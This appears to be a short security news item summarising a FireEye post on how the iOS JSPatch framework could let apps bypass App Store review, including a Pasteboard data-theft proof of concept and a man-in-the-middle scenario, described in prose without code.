“The JSPatch technology potentially allows an individual to effectively circumvent the protection imposed by the App Store review process and perform arbitrary and powerful actions on the device without consent from the users. The dynamic nature of the code makes it extremely difficult to catch a malicious actor in action.” states a blog post published by FireEye.
In one case presented as a proof-of-concept by the experts the attackers can exploit the iOS Pasteboard, commonly used to copy and paste content between different apps, exfiltrate personal data from victims mobile device.
There are two possible attack scenarios that exploit the JSPatch Framework, in one case malicious developers could initially deploy a harmless app on the store and later update it with malicious code through the JSPatch Framework, in a second scenario the attackers can run a Man-in-the-Middle attacks against a developer loads the framework via an unencrypted channel.
If you want further details on the JSPatch Framework and possible attack methods give a look to the post published by Fire Eye.